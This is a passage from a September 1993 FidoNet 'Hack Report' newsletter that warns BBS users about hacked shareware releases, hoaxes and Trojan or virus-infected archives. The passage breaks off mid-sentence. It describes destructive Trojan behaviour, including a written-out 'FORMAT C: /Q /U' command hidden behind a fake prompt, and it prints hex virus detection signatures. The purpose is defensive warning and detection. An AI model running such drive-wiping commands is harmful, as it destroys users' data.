2767 lines
134 KiB
Plaintext
2767 lines
134 KiB
Plaintext
=========================================================================
|
|
||
|
|
From the files of The Hack Squad: || by Lee Jackson, Moderator, FidoNet
|
|
|| Int'l Echos SHAREWRE & WARNINGS
|
|
The Hack Report || Volume 2, Number 9
|
|
for September, 1993 || Report Date: September 12, 1993
|
|
||
|
|
=========================================================================
|
|
|
|
Welcome to the ninth 1993 issue of The Hack Report. This is a series
|
|
of reports that aim to help all users of files found on BBSs avoid
|
|
fraudulent programs, and is presented as a free public service by the
|
|
FidoNet International Shareware and Warnings Echos and the author of the
|
|
report, Lee Jackson (FidoNet 1:124/4007).
|
|
|
|
This has not been a very good month here at Hack Central Station: not
|
|
only was the report delayed by a week due to a back injury, but the
|
|
August issue was the subject of a hack. It isn't the first time, and it
|
|
won't be the last. Also, a file reported as a hoax last month has been
|
|
reclassified as a Trojan, and many new pirated files surface. Thanks to
|
|
everyone who has helped put this report together, and to those that have
|
|
sent in comments and suggestions.
|
|
|
|
NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
|
|
your BBS, subject to these conditions:
|
|
|
|
1) the latest version is used,
|
|
2) it is posted in its entirety, and
|
|
3) it is not altered in any way.
|
|
|
|
NOTE TO OTHER READERS: The Hack Report (file version) may be freely
|
|
uploaded to any BBS, subject to the above conditions, and only if you do
|
|
not change the filename. You may convert the archive type as you wish,
|
|
but please leave the filename in its original HACK????.* format. The
|
|
Hack Report may also be cross-posted in other networks (with the
|
|
permission of the other network) as long as it meets the above conditions
|
|
and you give appropriate credit to the FidoNet International Shareware
|
|
and Warnings Echos (and the author <g>).
|
|
|
|
The idea is to make this information available freely. However, please
|
|
don't cut out the disclaimers and other information if you use it, or
|
|
confuse the issue by spreading the file under different names. Thanks!
|
|
|
|
DISCLAIMER: The listings of Official Versions are not a guarantee of the
|
|
files' safety or fitness for use Someone out there might just be
|
|
sick-minded enough to upload a Trojan with an "official" file name, so
|
|
>scan everything you download<!!! The author of this report will not be
|
|
responsible for any damage to any system caused by the programs listed as
|
|
Official Versions, or by anything using the name of an Official Version.
|
|
|
|
On this same note, programs and files listed in this report should not be
|
|
automatically considered dangerous. It is simply impossible for the
|
|
author of this report to receive and test copies of every listed file, so
|
|
many of the reports listed herein are based on information sent to the
|
|
author by individuals in the BBS community. For this reason, neither the
|
|
author of this report nor anyone officially associated with it shall be
|
|
held liable for any losses and/or damages resulting from a listing in
|
|
this report.
|
|
|
|
Finally, the releases listed as the latest Official Versions may not be
|
|
entirely accurate. However, they do reflect the latest version known to
|
|
the author of The Hack Report at the time of writing. That's the nature
|
|
of the beast we call shareware: authors have every right (and in this
|
|
writer's opinion, are well advised) to release a new version without
|
|
advance notice of any kind. If you see a version newer than one listed
|
|
here, please contact one of The HackWatchers or myself so that we can
|
|
keep these listings up to date.
|
|
|
|
*************************************************************************
|
|
|
|
Hacked Programs
|
|
|
|
Here are the latest known versions of some programs known to have hacked
|
|
copies floating around. Archive names are listed when known, along with
|
|
the person who reported the fraud (thanks from us all!).
|
|
|
|
Program Hack(s) Latest Official Version
|
|
======= ======= =======================
|
|
ARJ Archiver ARJ250 ARJ241A
|
|
Reported By: Tommy Vielkanowitz(1:151/2305)
|
|
ARJ239E
|
|
Reported By: The Hack Squad
|
|
ARJ239G
|
|
Reported By: The Hack Squad
|
|
ARJ240A
|
|
Reported By: Ryan Shaw (1:152/38)
|
|
ARJ300
|
|
Reported By: Mike Stowe (ITCNet, via HW Robert Hinshaw)
|
|
|
|
Blue Wave Offline BWAVE213 BWAVE212
|
|
Message Reader
|
|
Reported By: Don Becker (grendel@jaflrn.linet.org)
|
|
|
|
BNU FOSSIL Driver BNU202 BNU170
|
|
Reported By: Amauty Lambrecht (2:291/712) (not counting betas)
|
|
BNU188B
|
|
Reported By: David Nugent (3:632/348),
|
|
Author of BNU
|
|
|
|
DMS Amiga Disk DMS version 1.12 DMS version 1.11
|
|
Masher
|
|
Reported By: Ben Filips, via Jay Ruyle (1:377/31)
|
|
|
|
| F-Prot Virus Scanner FP-205B FP-209D
|
|
Reported By: HW Bill Lambdin
|
|
|
|
LhA Amiga Archiver LHA148E LHA138E (Shareware)
|
|
Reported By: Michael Arends (1:343/54) LHA v1.50r (Regist.)
|
|
LHA151
|
|
Reported By: Lawrence Chen (1:134/3002)
|
|
|
|
LHA Archiver (PC) LHA214 LHA213 (non-beta)*
|
|
Reported by: Patrick Lee (RIME address RUNNINGB)
|
|
LHA214B
|
|
ICE214
|
|
LHA215
|
|
Reported by: Kenjirou Okubo, LHA Support Rep.
|
|
(Internet address: kenjirou@mathdent.im.uec.ac.jp)
|
|
LHA300
|
|
Reported by: Mark Church (1:260/284)
|
|
|
|
MakeNL MKNL251 MKNL250
|
|
Reported by: Dan Guenthner (SAF-Net 44:900/200,
|
|
via HW Robert Hinshaw
|
|
|
|
Math Master MATHMSTR M-MST400
|
|
Reported by: James Frazee (1:343/158)
|
|
|
|
MusicPlay MPLAY31 MPLAY25B
|
|
Reported By: Lee Madajczyk (1:280/5)
|
|
|
|
PKLite PKLTE201 PKL115
|
|
Reported By: Wen-Chung Wu (1:102/342)
|
|
|
|
PKZip PKZ301 PKZ204G
|
|
Reported By: Mark Dudley (1:3612/601)
|
|
Jon Grimes (1:104/332)
|
|
|
|
| Shez SHEZ72A SHEZ92 (also
|
|
| SHEZ73 SHEZ92P patch)
|
|
Reported By: HW Bill Lambdin
|
|
|
|
Telemate TM40C TM412-1 through 4
|
|
Reported By: Philip Dynes, RIME Telemate conference,
|
|
via HW Richard Steiner
|
|
TM401
|
|
Reported By: HW Richard Steiner
|
|
TM410-1
|
|
Reported By: Bat Lang (1:382/91)
|
|
|
|
Telix Telix v3.20 TLX321-1
|
|
(Prior to Dec. 1992) TLX321-2
|
|
Telix v3.25 TLX321-3
|
|
Reported By: Brian C. Blad (1:114/107) TLX321-4
|
|
Peter Kirn (WildNet, via HW Ken Whiton)
|
|
Telix v4.00
|
|
Telix v4.15
|
|
Reported By: Barry Bryan (1:370/70)
|
|
Telix v4.25
|
|
Reported By: Daniel Zuck (2:247/30, via Chris
|
|
Lueders (2:241/5306.1)
|
|
MegaTelix
|
|
Verified By: Jeff Woods, deltaComm, Inc.
|
|
Telix Pro
|
|
Reported By: Jason Engebretson (1:114/36),
|
|
in the FidoNet TELIX echo
|
|
|
|
TheDraw TDRAW430 TDRAW461
|
|
TDRAW5
|
|
Reported by: Ian Douglas (5:7102/119)
|
|
TDRAW500
|
|
Reported by: Ian Davis, Author
|
|
TDRAW550
|
|
Reported by: Steve Klemetti (1:228/19)
|
|
TDRAW600
|
|
Reported by: Hawley Warren (1:120/297)
|
|
THEDR60
|
|
Reported by: Larry Owens (PDREVIEW echo, 1:280/17)
|
|
TDRAW601
|
|
Reported by: Jesper Tragardh (2:200/109)
|
|
TDRAW800
|
|
Reported by: James Carswell (1:153/775)
|
|
|
|
|
|
Wolfenstein-3D WOLF2-1 #1WOLF14
|
|
WOLF2-2
|
|
Reported By: Wen-Chung Wu (1:102/342)
|
|
WFSF2-IA
|
|
Reported By: Jared Huber (1:203/762)
|
|
|
|
|
|
* - See the section "Clarifications and Thanks" for details on
|
|
other valid version numbers for LHA.
|
|
|
|
|
|
=========================================================================
|
|
|
|
Hoax Alert:
|
|
|
|
| Whoa - what happened here? Wasn't there a report in the August 1993
|
|
| issue about OWS95B in this section of the report? Yes, there was, but it
|
|
| has been moved. After discussion with Aryeh Goretsky, SysOp of the
|
|
| McAfee VirusForum on CompuServe (76702,1714), this file has been
|
|
| reclassified. Look in The Trojan Wars section for details and for Aryeh
|
|
| Goretsky's comments.
|
|
|
|
|
|
HW Mikael Winterkvist reports that he received a program for study from
|
|
Patrik Sjoberg, the author of Febbs. The program Patrik found was called
|
|
VIP and claimed to be a "new, easy to use archive-program" called "Visual
|
|
Illusions Pack."
|
|
|
|
Mikael and Patrik both studied the program and determined that it was
|
|
merely an altered version of the LHA Archiver v1.13. To make matters
|
|
worse, the "author" asked for a registration fee. Save your money.
|
|
|
|
|
|
The Hack That Wouldn't Die has reared its ugly head again: XTRATANK is
|
|
still floating around out there, according to a sighting by Mike Ledoux
|
|
(1:132/202). This file was reported in detail in the 1992 Full Archive
|
|
Edition of The Hack Report (HACK92FA), but it seems to be so unwilling to
|
|
go away that it is mentioned again here. For those of you new to The
|
|
Hack Report, XTRATANK is a confirmed and tested hoax that does _not_
|
|
double your hard drive space, regardless of what you might see when you
|
|
do a DIR command. If you have doubts, try the Fitzgerald test below.
|
|
|
|
*** The Fitzgerald Test
|
|
|
|
Here is the now-famous Fitzgerald Test, devised by Tim Fitzgerald of
|
|
1:3800/18.0 and validated through testing performed by Bill Logan of The
|
|
Pueblo Group (1:300/22). Try this if you think you have managed to get
|
|
XTRATANK to work on your system. Follow these simple steps:
|
|
|
|
1. Run CHKDSK and write down the free space it reports as free.
|
|
2. Do a DIR command and write down what XTRATANK reports.
|
|
3. Copy any text file to a new text file.
|
|
4. Repeat steps 1 and 2, and compare.
|
|
|
|
You will see that XTRATANK reports that twice as much disk space is taken
|
|
up by the new text file.
|
|
|
|
|
|
Michael Toth (1:115/439.7) has located another incident of the Amiga
|
|
Emulator hoax, reported in the 1992 Full Archive Edition of The Hack
|
|
Report as AMIGA. This time, the file was under the filename IBM_AMGA,
|
|
and contained the following internal files:
|
|
|
|
Name Length Method Size now Mod Date Time CRC
|
|
============ ======== ======== ======== ========= ======== ========
|
|
README.USA 393 Imploded 338 10 Apr 91 18:07:06 2CF72B62
|
|
EMULATOR.EXE 273947 Imploded 157084 15 Sep 90 01:00:00 02A68881
|
|
============ ======== ======== ======== ========= ======== ========
|
|
*total 2 274340 ZIP 1.10 158592 13 Oct 91 11:28:00
|
|
|
|
The file claims to emulate Kickstart 1.2, version 33.192, on an IBM
|
|
compatible. Michael's tests show that this file doesn't do much, if
|
|
anything - 15 minutes worth of waiting after running the program produced
|
|
no results.
|
|
|
|
|
|
Recently, an archive of Frisk's (a.k.a. Fridrik Skulason's) F-Prot Virus
|
|
Scanner v2.07 has been distributed with a "registration form" from a
|
|
company called JLT. According to Frisk, this is not legitimate. He says
|
|
that JLT contacted him in the fall of 1992, asking if they could
|
|
distribute F-Prot, collect registration fees, and forward 50% of the fees
|
|
to him. Frisk didn't want them to do this, but it appears that an
|
|
archive with the "registration form" may have slipped into distribution.
|
|
In Frisk's words, "...this version is most certainly not something that I
|
|
want distributed."
|
|
|
|
|
|
From the "Not Really A Program, but Interesting Anyway" department, a
|
|
"press release" has entered distribution, claiming that PKWare Inc. has
|
|
filed for Chapter 11 bankruptcy. The letter is dated Friday, February
|
|
26, 1993, and supposedly quotes Mark Gresbach of PKWare in the statement.
|
|
|
|
However, in a message posted in the CompuServe PKWARE forum on March 1,
|
|
1993, PKWare employee Douglas Hay states that this is not true. Douglas
|
|
also points out that the perpetrator of the hoax misspelled the word
|
|
Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
|
|
the message for PKWare is wrong. In short, ignore the letter - PKWare
|
|
has _not_ filed bankruptcy.
|
|
|
|
|
|
Other previously reported hoaxes:
|
|
|
|
Filename Claimed use/Actual activity/Reporter(s)
|
|
============ ==========================================================
|
|
PKZ305 Hacked "new version" of PKZip. However, a message in wide
|
|
circulation claimed this was infected with a virus called
|
|
PROTO-T. This message is the actual hoax: there may be
|
|
one or more PROTO-T viruses around now, but none do what
|
|
was claimed in the hoax message. This hack, PKZ305, was
|
|
not infected with any virus, nor did it contain Trojan
|
|
code, per testing by Bill Logan (1:300/22), HW Jeff White,
|
|
and HW Bill Lambdin.
|
|
|
|
RAOPT "Optimizes" your RemoteAccess BBS files and claims to be
|
|
from Continental Software. Actually does nothing but read
|
|
your USERS.BBS file and report the number of users. The
|
|
program is _not_ from Continental Software, according to
|
|
Andrew Milner. Reported by Kai Sundren (2:201/150), via
|
|
HW Mikael Winterkvist.
|
|
|
|
SCORCHV2 Claims to be v2.0 of the game Scorched Earth: this version
|
|
doesn't yet exist. Actually a renamed archive of version
|
|
1.2. Reported by Brian Dhatt (1:3648/2.5).
|
|
|
|
=========================================================================
|
|
|
|
The Trojan Wars
|
|
|
|
Well, folks, it has happened again. Someone apparently doesn't like the
|
|
idea of The Hack Report, and has decided to take a hack at it themselves.
|
|
Fortunately, it was caught rather quickly, thanks to the people who read
|
|
and support the report. Your assistance is very much appreciated, folks!
|
|
This isn't the only new report for the month - oh yes, there is more.
|
|
So, sit back, buckle up, enjoy the scenery, and read on.
|
|
|
|
|
|
| As I just mentioned, there has been another attack against The Hack
|
|
| Report itself: this time, against the August issue. James Anderson (1:
|
|
| 379/609) left a message on Jack Cross's system (1:3805/13, Official Hack
|
|
| Report Utility Distribution Site) and a copy of the August report archive
|
|
| which contained the file HMON.EXE. This Trojan, found by one of James's
|
|
| users on a Florida BBS, attacks mostly .exe files on your path, as well
|
|
| as some Windows programs and COMMAND.COM (according to James' report).
|
|
|
|
|
| The archive of the report had one of its text files altered as well. The
|
|
| NOTE9308.TXT file had a paragraph inserted at the beginning which claimed
|
|
| that the HMON.EXE file was a "small virus-detection program" that "i and
|
|
| others (sic) were developing." Those of you who have followed this
|
|
| report since its start would suspect this immediately, as I have
|
|
| previously stated that I am not an anti-viral programmer or researcher:
|
|
| merely a journalist who relays reports he receives from others.
|
|
|
|
|
| The paragraph goes on to say (in very bad grammar) that the file should
|
|
| be placed in the same directory as SCAN.EXE, and recommends that you put
|
|
| it on your path. I do not know why, but I would assume that it looks for
|
|
| McAfee's SCAN and does something nasty to it.
|
|
|
|
|
| In any event, allow me to restate the warning that I made when this
|
|
| happened previously:
|
|
|
|
|
| THE OFFICIAL ARCHIVE OF THE HACK REPORT WILL _NEVER_ CONTAIN
|
|
| ANY EXECUTABLE OR BATCH FILE! ONLY TEXT FILES AND NON-
|
|
| EXECUTABLE BINARY FILES WILL BE INCLUDED IN THE REPORT ARCHIVE.
|
|
|
|
|
| If you have _any_ doubt of the legitimacy of your copy of the report,
|
|
| please inform your friendly neighborhood HackWatcher or myself, and
|
|
| contact one of the official distribution sites to obtain an official
|
|
| copy.
|
|
|
|
|
| With the above in mind, and taking into regard the best interests of the
|
|
| BBS community, HACK9308 goes into the report as a file to avoid.
|
|
|
|
|
|
| From the "I'll Sell You the Brooklyn Bridge for $5" department: a file
|
|
| claiming to be an archiver that can achieve 1500:1 compression of almost
|
|
| any file has been spotted. Sounds too good to be true? You're right: it
|
|
| is too good to be true.
|
|
|
|
|
| The file in question is called OWS95B. The first report I received on it
|
|
| came via HW Bob Seaborn, although at least a dozen reports similar to his
|
|
| came through the echos I monitor or through NetMail. In short, the file
|
|
| does nothing more than act like an "undelete" utility of sorts, storing
|
|
| filenames and copying them to other directories. Test results of this
|
|
| file can be seen in the file FILETSTS.LZH, part of the archive version of
|
|
| The Hack Report. Look for two files inside this internal archive: a
|
|
| text report from Kevin Gates (1:140/64) called OWS.RES, and a dump of the
|
|
| data segment of the program, DS_DUMP.OWS.
|
|
|
|
|
| If you have a copy of this program and need to see for yourself that it
|
|
| is a fraud, here is a test devised by Bob that should do the trick.
|
|
|
|
|
| *** The Seaborn Test
|
|
|
|
|
| 1) Create a temporary working directory (\WORK) and a temporary test
|
|
| directory (\TEST) on any drive.
|
|
| 2) Copy any number of mixed files into the \WORK directory.
|
|
| 3) Use OWS.EXE to create \TEST\archive.ows of \WORK\*.*
|
|
| 4) Now use SUNOWS.COM to tear apart \TEST\archive.ows, with the files
|
|
| going into the \TEST directory.
|
|
|
|
|
| At this point everything should appear to work properly.
|
|
|
|
|
| 5) Delete all the original files in the \WORK\*.* directory.
|
|
| 6) Use SUNOWS.COM to extract all the files in the \TEST\archive.ows
|
|
| file to restore all the files originally in the \WORK directory.
|
|
|
|
|
| This will fail giving you a "Sector Not Found, Abort, Retry, Fail"
|
|
| error, and there's nothing that you can do to solve this error.
|
|
|
|
|
| This file was originally reported in the Hoax Alert section of this
|
|
| report. However, Aryeh Goretsky, SysOp of the McAfee VirusForum on
|
|
| CompuServe (76702,1714) pointed out that this is actually a Trojan. Here
|
|
| are his comments, used by permission:
|
|
|
|
|
| "The program is indeed a Trojan horse. It is an expectation of the
|
|
| author that the user will delete the original uncompressed file. An
|
|
| expectation that is filled most of the time...."
|
|
|
|
|
| I had not considered this when I classed the file as a simple Hoax.
|
|
| However, Aryeh is right. This is a very sneaky Trojan. It doesn't do
|
|
| any damage to your system: instead, it fools you into doing the damage
|
|
| yourself.
|
|
|
|
|
|
| Ian Douglas (5:7105/119) forwarded a sighting of RAG2FIX from Tiaan Van
|
|
| Aardt (5:7105/8). This file, a supposed "fix" for RemoteAccess
|
|
| v2.00gamma, gives itself away by using the company name "Continental
|
|
| Software" - a name no longer in use by the RA folks. The Trojan first
|
|
| searches for your FILES.RA file, and then erases all files in the current
|
|
| directory, your RA.KEY file, and any ARJ, LZH, and ZIP files it runs
|
|
| across. Hopefully, this hasn't spread outside of FidoNet Zone 5
|
|
| (Africa), but you never know: keep your eyes open.
|
|
|
|
|
|
| Carl Johnson (1:115/363) reported on VIZ534, a possible isolated incident
|
|
| involving a program called VIZ. From Carl's analysis, he was unable to
|
|
| determine if this was a pure Trojan, an altered legitimate program, or a
|
|
| Trojan masquerading as a legitimate program. However, Michael Toth, a
|
|
| regular contributor to The Hack Report, received a copy of the file and
|
|
| verified its destructive behaviour. Here are the archive contents:
|
|
|
|
|
| Files in archive: VIZ.DAT, 22426 bytes
|
|
| VIZ.COM, 3163 bytes
|
|
| VIZ.DOC, 65715 bytes
|
|
| VIZ.REG, 3676 bytes
|
|
|
|
|
| What it's supposed to do: Accelerate video performance, as
|
|
| well as do a few utilities with
|
|
| the video display.
|
|
|
|
|
| Carl learned that when the VIZ.COM file is run, it renames VIZ.DAT to
|
|
| BE.EXE (a file from The Norton Utilities v6.X, known as Batch Enhancer).
|
|
| Next, it displays a configuration screen, then displays the string:
|
|
|
|
|
| "Is this text in red? (Y/N)
|
|
|
|
|
| At some point during all of this, it executes the system command
|
|
| FORMAT C: /Q /U, apparently suppressing the output and replacing it with
|
|
| the above string. This tricks the user into answering "yes" to the
|
|
| normal warning about all data on the non-removable drive being lost.
|
|
| John says that he was lucky in that he uses MS-DOS 6.0 and DoubleSpace,
|
|
| which prevented the normal FORMAT command from operating (a side benefit
|
|
| of DoubleSpace? Trojan protection? Interesting.).
|
|
|
|
|
|
| HW Bill Lambdin received a file for testing from Brian O'Sullivan. The
|
|
| file, SPORT21C, claims to be a serial port analyzer. It seems that Brian
|
|
| has located an infected copy of the program, possibly an isolated
|
|
| incident. The INSTALL.COM file in the archive is infected with a new
|
|
| variant of the Butterfly virus, which differs from the original in that
|
|
| it contains the text "Hurray the Crusades!", and that it infects .exe
|
|
| files as well as .com files. Bill provides the following information for
|
|
| users of Frisk's F-Prot and other scanners that allow for external scan
|
|
| strings:
|
|
|
|
|
| "F-Prot 2.09 detects this virus as Butterfly in .COM files, but
|
|
| misses it in .EXE files. Add this signature to F-Prot or others
|
|
| scanners that allow the use of external signature file.
|
|
|
|
|
| Name: Butterfly (Crusades)
|
|
| Infects: .COM and .EXE files.
|
|
| Signature: B4 4E 8D B6 50 02 8D 96 2C 02 52 EB 3C B4 1A BA
|
|
|
|
|
| Remove the spaces between the HEX values when adding the signature."
|
|
|
|
|
|
| Martin Roesler (Martin_Roesler@nem.fido.de, 2:246/149) posted a message
|
|
| in the FidoNet VIRUS_INFO echo that was rather short and to the point.
|
|
| He stated that a file called BREAKARJ is circulating in Germany, and that
|
|
| it contains the Split virus. He ended by saying that Split is a simple
|
|
| COM infector, 250 bytes long, and can be detected with the following
|
|
| signature:
|
|
|
|
|
| 9CFC 8DB6 DF01 BF00 01B9 0200
|
|
|
|
|
| Short, to the point, and much appreciated.
|
|
|
|
|
|
Glenn Jordan (1:3641/1.201) reports on a "wave of Trojans down in
|
|
Oklahoma" (or up in Oklahoma, depending on your geographical
|
|
perspective). His contact originally came via Doug Taylor of the
|
|
Vanishing Point BBS. According to Glenn, someone got a bunch of [IVP]
|
|
produced viruses and a Trojan produced by a Trojan Construction Kit, then
|
|
proceeded to upload them to quite a few systems. The only filename
|
|
provided, however, was ZIPCHAP, which contained an ANSI bomb that
|
|
redefined your spacebar to invoke an internal ZIPCHAP program (apparently
|
|
infected - Glenn's copy was corrupted and wouldn't run).
|
|
|
|
This ANSI bomb is a bit different from others that I have seen, but not
|
|
unique in its method. It is stored inside the archive under the filename
|
|
CON. In other words, it's actually a device bomb variant - turning off
|
|
ANSI comments in PKZIP or other unpackers won't stop it, since it isn't
|
|
part of the header. Instead, unpacking the file causes the device CON to
|
|
be opened, and the bomb is written straight to it as a result.
|
|
|
|
|
|
HW Chris Wise received reports on two Trojans from Jim Deal (address not
|
|
given). The first, PRIN2UNP, claimed to be an "unprotect" for Prince of
|
|
Persia 2, but appears to be a compiled batch file that does a good deal
|
|
of damage. It starts by deleting everything in your C: drive root
|
|
directory, as well as the directory C:\DOS. It then checks to see if you
|
|
are running a BBS: if so, it deletes the files in your BBS directory.
|
|
Finally, it looks for other drives in your system and deletes their root
|
|
directories as well.
|
|
|
|
The second Trojan, VECTORS, was described as a Sound Blaster demo
|
|
program. It was compressed with PKLite v1.15. This one simply deletes
|
|
all files in your C: drive's root directory, but that is enough to make
|
|
your system unbootable for a while. This wasn't a compiled batch file:
|
|
however, Jim's report stated it contained some Borland BGI drivers, which
|
|
indicates it had some graphics in it (apparently to show off).
|
|
|
|
Jim says that both files came from the same place. I assume he meant
|
|
they were both done by the same person, as both had a message inside that
|
|
said, "Thanks for trusting F.*.C.K.S. INFORMER."
|
|
|
|
|
|
Rod Fewster (3:640/886) did a bit of detective work on a file claiming
|
|
to be version 8.2 of Vern Buerg's LIST program, under the filename
|
|
LIST82. He says he called Mr. Buerg to confirm the file, and verified
|
|
that this is not a valid release. In fact, the file Rod received from
|
|
one of his users is infected.
|
|
|
|
His examination of the file shows it to be compressed with PKLite, using
|
|
the "no unpack" option. Further, the documentation has been altered to
|
|
look authentic, and the archive was packed with a PKZip -AV stamp which
|
|
displays the text "Authentic files from Vernon D. Buerg" when unzipped.
|
|
The only giveaways Rod could find were that the internal help screen date
|
|
didn't match the filedates, and the copyright notice reads "1983-92".
|
|
|
|
Rod says the file is infected with a variant of the Butterfly virus which
|
|
he calls the FJM virus ("for want of a better name"). This virus infects
|
|
.com files in the directory it is executed in by attaching itself to the
|
|
end of a few files at a time, increasing each file's size by 305 bytes.
|
|
The infected files then spread the infection. The virus does not attack
|
|
COMMAND.COM, nor does it attack files "smaller than about 100 bytes."
|
|
|
|
The virus does not show immediately inside of the LIST program, but the
|
|
files it infects are detectable by VirusBuster v4.00.23, F-Prot, and
|
|
TBAV in heuristic mode. VirusBuster can disinfect the infected files.
|
|
|
|
Rod provided the following scan string that users of VirusBuster v4.xx
|
|
can add to their VBTSR.DAT file:
|
|
|
|
Butterfly/FJM
|
|
ED ?12 96 ?10 96 ?0F DB ?08 BC ?02 BD ?04 ED ?02 DB
|
|
|
|
He says this will stop Butterfly and FJM dead in their tracks. Thanks
|
|
for the report, Rod!
|
|
|
|
|
|
An extremely widely reported incident concerned Winfred Hu's Telemate
|
|
program, v4.11. Winfred himself has confirmed that an internal
|
|
self-extracting archive, VESA.EXE, which is part of the archive TM411-4,
|
|
contains two files that are infected with the Butterfly virus. These
|
|
files, in the archive subdirectory OAK, are 37VESA.COM and 67VESA.COM.
|
|
The infection can be detected by F-Prot v2.08a.
|
|
|
|
Winfred has since distributed a replacement archive, TM411-4A, which does
|
|
not contain these files. (This has now been superseded by a new
|
|
version, TM412-1 through TM412-4.) He has asked that anyone who has the
|
|
infected archive delete it and replace it with the newest version. He
|
|
also stresses that neither Telemate or GIFLink (part of the Telemate
|
|
package) are infected - only the two VESA drivers.
|
|
|
|
Winfred has since informed me via HW Richard Steiner that the same VESA
|
|
drivers are present in the files GIFLK110 and GIFLK111. He has asked
|
|
that these two archives be deleted and replaced with GIFLK112 (or the
|
|
most current version). GIFLK112 has a README.TXT file which mentions the
|
|
infected VESA drivers inside the v1.10 and v1.11 files.
|
|
|
|
He also states that he has traced the infection back to an isolated
|
|
incident of an infected copy of LIST77B. He was unable to say for
|
|
certain where this copy originally came from.
|
|
|
|
Editorial - as I've said before, it takes a lot of courage for an author
|
|
to publicly announce such a problem with their software. Winfred Hu is
|
|
to be commended for his handling of this situation, and for the prompt
|
|
action he has taken to resolve it.
|
|
|
|
|
|
Gary Marden (2:258/27) has located a Trojan version of a file that was
|
|
quite popular last year - USRPATCH. This was originally distributed as a
|
|
"patch" to the ROMs of a certain modem that would take advantage of a bug
|
|
left in the ROM chips in order to upgrade the modem to faster speeds.
|
|
|
|
However, this Trojan takes advantage of your system instead of your
|
|
modem. At first look, it appears to be a mutation of the BILLNTED Trojan
|
|
reported last year by David Elkins (2:254/78). Gary says that it acts
|
|
more like the QOUTES Trojan reported later in this section. It displays
|
|
the following messages once you invoke the internal USRPATCH.EXE file:
|
|
|
|
Please wait, extracting user files.Bill'N'Ted have begun their
|
|
bogus journey...
|
|
Bill'N'Ted have begun their bogus journey.
|
|
Looks like an Evil Robot Bill'N'Ted have trashed your drive, dude!
|
|
|
|
At this point, your prompt turns into a simple "C>". If you press Enter,
|
|
your screen displays the message, "So long, suckers!", and then clears,
|
|
leaving you with a system that is quite useless.
|
|
|
|
Gary's test, performed on an MFM drive, resulted in a hard drive with the
|
|
first 128 cylinders low-level formatted. This included the partition
|
|
table, boot sectors, and FATs. Repair is not possible using FDISK alone,
|
|
since the first 128 cylinders remain inaccessible. The only practical
|
|
repair is to perform your own low-level format, followed by FDISK and a
|
|
high-level format.
|
|
|
|
Gary did not test this with an IDE drive, but I am willing to wager that
|
|
he would have had the same results. Repair would not have been as
|
|
simple, however - unless you have some heavy-duty IDE utility software,
|
|
you'd have to send your drive back to the manufacturer for a low-level
|
|
format. Most bogus indeed.
|
|
|
|
|
|
HW Emanuel Levy forwarded a report from John Rose (1:106/6001) about
|
|
FORUM30. The file, according to John, was "cleverly disguised as a 'new
|
|
BBS package'...." However, John says it formatted both of his hard
|
|
drives.
|
|
|
|
|
|
Andrew Barnhardt (1:247/301) forwarded a post from Dom D'amato
|
|
(1:141/510) about an Amiga Trojan/dropper in circulation. The file,
|
|
MCHECK, claims to be a modem test utility. However, the original
|
|
reporter, Luca Spada (2:331/106.0), states that this file reports that
|
|
your modem is "OK" even if no modem is attached to your system.
|
|
Apparently, the Trojan monitors the keyboard for activity - if you leave
|
|
it alone for 5-10 minutes, it begins to overwrite random tracks on your
|
|
hard drive with endless obscenity. Luca says it can reduce all of your
|
|
partitions to garbage in about 4 seconds.
|
|
|
|
Another unidentified user reported that the Trojan looks for the presence
|
|
of an antiviral background program called SnoopDos - if it finds it, it
|
|
deactivates it.
|
|
|
|
The archive contains these two files:
|
|
|
|
Modemcheck.doc 2227 Bytes
|
|
Modemchecker 15516 Bytes
|
|
|
|
Definitely sounds like one that Amiga users should avoid.
|
|
|
|
|
|
HW Ken Whiton forwarded a message from Wildnet user Kevin Tischler about
|
|
an incident of a tampered version of the AVScan antiviral tool, AVSCAN83.
|
|
This file supposedly contains an internal file called VIRUS.DAT, which is
|
|
"sometimes unzipped" by the host program, leaving five files behind.
|
|
These five files are 911.COM, YANKEE.COM, SYSLOCK.COM, ANTHRAX.COM, and
|
|
"a program reporting to be an icon viewer/maker called rim300.zip."
|
|
Kevin reports that MicroSoft AntiVirus (part of MS-DOS 6.0) was able to
|
|
detect the infection - from the way it looks, the first 4 files are the
|
|
real things.
|
|
|
|
|
|
Ryan Thompson (1:124/2213) reports that one of his users found a file
|
|
calling itself ARJ240, claiming to be the non-beta release of the next
|
|
ARJ archiver. This immediately trips a flag, since the author of ARJ,
|
|
Robert Jung, has publicly stated that there would never be a version with
|
|
this number (due to an earlier hack by the same name).
|
|
|
|
In any case, the file appears to be not merely a hack, but a simplistic
|
|
Trojan. The program that was altered to do the damage was REARJ.EXE.
|
|
When Ryan's user ran it, it copied a file called SINBAUD.EXE to the root
|
|
directory and re-wrote the user's autoexec.bat file to invoke this file.
|
|
The SINBAUD file, according to Ryan's inspection, contained "a few
|
|
hard-coded CHKDSK messages, some stuff for displaying a fake DOS prompt",
|
|
and a few other messages. He did not run the SINBAUD program, which is
|
|
just as well - the overwrite of the autoexec.bat is enough to merit
|
|
Trojan status.
|
|
|
|
|
|
As many of you might know, The Hack Report does not include listings of
|
|
programs designed to "crack" or "register" other programs. I feel that
|
|
these files don't need the free publicity that they would get from a
|
|
listing in this report, and that the act of listing might make someone go
|
|
out looking for a copy of one of them. (See Ray Bradbury's short story,
|
|
"Downwind from Gettysburg," from the collection "I Sing the Body
|
|
Electric!", for an insight to your Hack Squad's thinking on this
|
|
subject.)
|
|
|
|
However, a report from David Jones (1 @ 2950 WWIVnet, Internet address
|
|
87-2950@wwiv.tfsquad.mn.org) merits an exception to this rule. He has
|
|
found a file called RPIT352C, a copy of the online game "The Pit" with a
|
|
"special program that will automatically register it for you." Inside
|
|
the archive is a README.COM file that is infected with the Leprosy virus.
|
|
|
|
This is a good reason to not even download these "cracks" - you never
|
|
know what you're getting into.
|
|
|
|
|
|
Rod Fewster (3:640/886) reported in the FidoNet VIRUS Echo on a file
|
|
called TNN202 that he tested. This file apparently contains at least 3
|
|
files named TNN.EXE, TNN.OV1, and TNN.OV2. TNN.EXE displays the
|
|
following message:
|
|
|
|
TNN Anti-Virus (C) 1992-1993 by Syn Labs Inc. Version 2.02.
|
|
Configuring, Please wait....
|
|
|
|
At this point, the program renames TNN.OV1 to TNN1.EXE, and TNN.OV2 to
|
|
TNN2.COM. According to Rod, TNN1.EXE is the "RABID" Trojan, while
|
|
TNN2.EXE is the Beta 1 Trojan. RABID "whacks out your HD's boot sector,"
|
|
